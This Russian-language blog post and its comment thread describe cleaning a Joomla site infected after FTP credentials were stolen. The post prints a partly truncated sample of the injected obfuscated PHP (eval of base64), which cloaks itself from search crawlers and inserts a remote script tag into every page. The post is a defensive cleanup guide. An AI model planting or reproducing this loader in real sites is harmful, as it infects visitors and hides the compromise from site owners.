Как избавиться от вредоносного кода на сайте

Это уже стало традицией, что в начале каждого года, я на Белой Шляпе пишу про вирусы, программы-вымогатели, порно-баннеры и вот теперь, про вредоносные коды на сайте.

Случилось  в середине прошлого года так, что один из моих сайтов накрутил вредоносный код. Я тогда не знал как от него избавиться, да и версия Joomla уже морально устарела. Я  просто установил joomla последней версии и импортировал в нее старый сайт со всеми материалами (так называются в Joomla посты и страницы), пользователями и комментариями.

Но не прошло и двух недель после успешного функционирования сайта на новом движке, как вредоносный код появился снова. Слава Богу, я успел его заметить быстрее, чем Яндекс.Вебмастер, который сразу выносит строгое предупреждение. Случилось это из-за моей паталогической рассеянности. Я оставил рабочий компьютер включенным на ночь, а на нем открытый Total Commander, а в коммандере осуществленное соединение с FTP сервером этого сайта. Злым хакерам хватило двенадцати часов, чтобы проникнуть на рабочий комп, стырить с него параметры доступа FTP и накидать мне на сайт всякого говна.

Что делать если сайт накрутил вредоносный код, как его удалить?

1. Зайти в Total Commander и удалить с него параметры доступа на сайты по FTP

2. Впредь вводить пароли и логины для FTP только вручную каждый раз, когда хотите соединиться.

3. Зайти в панель хостера и сменить пароль доступа на FTP (обычно этот пароль совпадает с паролем всего аккаунта)

4. Зайти по FTP в корень директории зараженного сайта

5. Отсортировать файлы по дате изменения.

6. Открывать самые «новые» файлы независимо от их расширения и удалять расположенный, обычно, вначале php код примерно такого вида:

<?php /**/ eval (base64_decode («aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJE
dMT0JBTFNbJ21yX25vJ10pKXskR0xPQkFMU1snbXJfbm8nXT0xO2lmKCFmdW5jdGlvbl9leGlzdHMoJ2
1yb2JoJykpe2lmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXtmdW5jdGlvbiBnbWwoKXtpZiAoIXN0cmlz
dHIoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdLCJnb29nbGVib3QiKSYmKCFzdHJpc3RyKCRfU
0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpe3JldHVybiBiYXNlNjRfZGVjb2RlKCJQSE
5qY21sd2RDQnpjbU05SW1oMGRIQTZMeTlwYm5OdmJXNXBZV0p2YkdScGJtWnZibVYwTG1OdmJT
OXRiUzV3YUhBaVBqd3ZjMk55YVhCMFBnPT0iKTt9cmV0dXJuICIiO319aWYoIWZ1bmN0aW9uX2
V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFI1QTlDRjFCNDk3NTAyQUN
BMjNDOEY2MTFBNTY0Njg0Qyl7JFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RD
1Ab3JkKEBzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywzLDEpKT
skUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PTEwOyRSQTNENTJFNTJBND
g5MzZDREUwRjUzNTZCQjA4NjUyRjI9MDtpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5N
jJBRjVEJjQpeyRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9QHVucGFjaygndi
csc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMTAsMikpOyRS
NjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFR
kVBRDA3QTREOTFFMjlFQlsxXTskUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQU
Q5Kz0yKyRSNjNCRURFNkIxOTI2NkQ0RUZFQU....................................................................
1ODEyODg1QTUzREFEOT1Ac3RycG9zKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2ND
Y4NEMsY2hyKDApLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKzE7f
WlmKCRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQmMTYpeyRSQkU0QzRE
MDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ
0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4O
DVBNTNEQUQ5KSsxO31pZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpey
RSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkrPTI7fSRSMDM0QUUyQUI5NE
Y5OUNDODFCMzg5QTE4MjJEQTMzNTM9QGd6aW5mbGF0ZShAc3Vic3RyKCRSNUE5Q0YxQ
jQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg
1QTUzREFEOSkpO2lmKCRSMDM0QUUyQUI5NEY5OUNDODFCMzg5QTE4MjJEQTMzNTM9P
1GQUxTRSl7JFIwMzRBRTJBQjk0Rjk5Q0M4MUIzODlBMTgyMkRBMzM1Mz0kUjVBOUNGMUI
0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDO31yZXR1cm4gJFIwMzRBRTJBQjk0Rjk5Q0M4
MUIzODlBMTgyMkRBMzM1Mzt9fWZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MD
k4OTVFRjU0RUJBN0ZBNkI3OEIpe0hlYWRlcignQ29udGVudC1FbmNvZGluZzogbm9uZScp
yRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREU9Z3pkZWNvZGUoJFJFODJFR
TlCMTIxRjcwOTg5NUVGNTRFQkE3RkE2Qjc4Qik7aWYocHJlZ19tYXRjaCgnL1w8XC9ib2R5L3
NpJywkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFKSl7cmV0dXJuIHByZ
WdfcmVwbGFjZSgnLyhcPFwvYm9keVteXD5dKlw+KS9zaScsZ21sKCkuIlxuIi4nJDEnLCRSQ
TE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpO31lbHNle3JldHVybiAkUkExNzlB
QkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFLmdtbCgpO319b2Jfc3RhcnQoJ21yb2J
oJyk7fX0=»));?>

Короче, абракадабра, заключенная в теги обычного PHP кода. Эту всю пакость вместе с тегами надо удалить, а файл сохранить. Точно также проверить все файлы, лежащие не в корневой директории,  и файлы других сайтов, находящихся на этом хостинге.

У меня нашлось около десяти файлов, в которые был внедрен вредоносный код. Файлы были с расширениями *.php, *.txt, *.html и совсем без расширения. После чистки по указанной методике, код перестал себя как либо проявлять, сайт заработал в штатном режиме.

Кстати, если Яндекс все-таки вычислил то, что сайт заражен, то сообщения об этом будут идти еще некоторое время после очистки, этого бояться не надо. Через некоторое время придет письмо о том, что вредоносный код не обнаружен и посещаемость, которая обычно, падает после заражения,  выправится.

У меня порос:
Успел ли вредоносный код, расположенный на моем сайте, заразить мой же компьютер?

Еще один вопрос:
Может ли быть заражен сайт, сделанный на WordPress или Maxsite SMC?

Тех, кто знает ответы на эти вопросы или другие методики, в основном интересуют автоматизированные методики с помощью скриптов, пишите в комментариях — страна будет вам благодарна и не забудет вас никогда!

  1. Наблюдатель

    Евгений, а нет ли какой примочки, чтобы проверить свой WP на наличие подобной заразы?

    Да, кстати, позапрошлым летом я, таки, подхватил вирус на свой, совсем еще «зеленый» тогда, бложек. Но, помниться, тогда много народу пострадало — какая-то массированная атака была на WP, помнится. Происки этих, как их... империалистов, во.

    Да, и еще, кстати — с Рождеством Христовым тебя, дружище!!! Как у тебя вообще дела-то? Здоров ли?

  2. eavasi Автор записи

    Я,слава Богу, здоров, причем, исключительно благодаря твоим усердным молитвам. Поздравляю и тебя с Рождеством Христовым.

    Скрипты конечно есть для проверки, я находил несколько штук, но все они специальные, расчитанные на один вид кода и не факт, что выловят тот код, который висит в данный момент у тебя.

    Да, я помню, что летом ты жаловался на то, что империалистские хакеры атаковали молодые блоги и тебя зацепили.

        1. eavasi Автор записи

          Вот ты бедолага! Лета надо ждать! То ли дело кошки! Не успеваешь соскучиться. Всегда рядом. Можно в постель положить и греться об нее. Лечебный эффект такой же как и от пчел, жалит так же, вместо жужжания — мурлыкает. Преимущество — никогда не улетает из улья. Всегда сидит дома. И столько народу вокруг себя не собирает (трутни там, рабочие). Подумай. Может кошки лучше?

            1. eavasi Автор записи

              Кошки не приносят, конечно, такого дохода, но меня смущает то, что пчел нельзя положить с собой рядом на диване и погладить или почесать между ушами. :-))))))))))))))) Да и ушей, вроде, у пчел, в нашем человеческом понимании, нету. :-)))))))))))))))

              Кроме того, как можно выяснить, как конкретно взятая пчела к тебе относится? Заглянув пчеле в глаза, я думаю, ничего такого прочитать не удастся. :-)))))))))))))))

  3. Белозер

    Вы что параноики?

    В мобильнике предусмотрен ввод пин-кода при включении, может вы и его используете? Ну типа нужно позвонить, включу мобилу, введу пин-код и позвоню. Конечно гемор, но зато безопасно.

    Хотите безопасности, заведите свой физический сервер. Очень жестоко и ревностно относитесь к чужим программам, особенно крякнутым или бесплатным.

    А волшебнику в шляпе скажу: ftp-соединение сервер разрывает через строго указанное время и это не 12 часов, это несколько минут ибо каждый системщик трепетно ценит ресурсы своего сервера и отвечает за его безопасность.

  4. Макс

    А у меня вообще в Яндекс.Вебмастер появился чужой сайт, правда почему-то не подтвержденный. Сайт коммерческий. Вот сижу и думаю, не знай я сам его по не внимательности добавал, или кто-то мне ебет мозг.

  5. Oleg

    У меня было подобное дважды. Первый раз причины так и не нашел и удалял все в ручную. Второй раз случилось в прошлом году. Начал выяснять причину, списывался с техподдержкой хостинга. Все дружно предположили наличие трояна на моем компе. Как они мне написали есть такой троян, который через FTP вот эту гадость и вписывает. Троян действительно отыскался. А вот прописалась эта гадость везде, где только могла: в индексные файлы, в java скрипты и т.д. В ручную чистить уже было бессмысленно. Пришлось переустанавливать WP по чистому, предварительно сохранив базу.

    1. eavasi Автор записи

      Мне, видимо тоже придется прибегать к кардинальным мерам типа переустановки движка, потому что эппопея не закончилась и код продолжает появляться. Спасибо вам за вашу историю.

      1. Oleg

        Женя, я уверен в том, что это вирус. Он сидит где-то на твоем компе. Я тогда избавился от него только утилитой CuteIt от DrWeb. Кроме всего прочего, тех поддержка посоветовала сменить все пароли по FTP, что я и сделал.

        1. eavasi Автор записи

          У меня на компе работает постоянно антивирус DrWEB и пароли я меняю ежедневно. Теперь уже стал делать пароли из 45 знаков. Пока не помогает. Может тоже КюрАйТи прогнать?

          1. Oleg

            А у меня стоял NOD32, и тоже недоглядел. Антивирусы вообще не 100%-я гарантия. Вот подобное уже обсуждалось: _http://joomlaforum.ru/index.php?topic=82461.0

  6. daytails_ru

    А если быстро отследили, невозможно ли было просто восстановить сайт из бэкапа?

    У меня хостер хранит бэкапы за три последних дня (насколько помню) — пару раз пригодилось.

  7. Kaena

    У нас один раз было что-то подобное на WordPress'е. Благо, муж заметил и мы все исправили. 🙂

    1. eavasi Автор записи

      А у меня вот не получается окончательно от него избавится, эта хрень периодически появляется. Приходится перезаливать из резервной копии.

  8. oldvovk

    Яндекс не только предупреждает, но и банит. У меня так в январе один в полет пошел. До сих пор в ауте. Поддержка ни бе ни ме.

    По поводу. Перепроверь настройки сервера, файл аккесе с глобальными доступами, проверь конфиг, особенно в первых строках, запрет доступа с ftp. Мне вроде помогло, полгода уже, куча попыток и не пробили.

    1. eavasi Автор записи

      Пишите в поддержку. Не отставайте от них и они должны прореагировать. Спасибо за советы.

  9. oldvovk

    Тут два варианта проникновения.

    1й — через дырки в cms joomla и прочее. Основные жырки известны, защита предлагается. Я уже упомянул об этом.

    2й — шеллом. И тут опять варианты. Если не удалили основной и спрятанные в файлах, то будет появляться постоянно. Шелл может находиться и на соседнем акке, и самому тут ничего не сделать. На серчинже есть ветка целая с обсуждением по dle такого.

    1. eavasi Автор записи

      М-да, я уже знаю об этом и как мог обезопасился от новой атаки. Для обеспечения безопасности перевернул полинтернета 🙂

  10. vally

    недавно нашла свой сайт в списке взломанных, но кажется никакого кода вроде бы не обнаружила, по крайней мере поисковики не указывают, что есть код и сайт работает в обычно режиме... а, кажется и тебя я нашла по тому списку?..

    в общем, странно все это, но мне показалось, что мой хостер решил проблему очистки сайта от внедрения вред.кодов — я его начала расспрашивать уже постфактум, приятно, если это действительно так:) припоминаю, что было время неработы сайта, но тогда как раз меняла регистратора домена, вот и списала на него все — чет долго он регистрировал:)

    1. eavasi Автор записи

      Есть специальные сервисы онлайн, которые проверяют сайты на наличие кода. Есть смысл Вам воспользоваться одним из них.

      За вредоносный код могут быть приняты любые скрипты, заключенные в iframe, так что в Вашем случае может быть и ошибка.

Добавить комментарий

Ваш e-mail не будет опубликован.

Этот сайт использует Akismet для борьбы со спамом. Узнайте как обрабатываются ваши данные комментариев.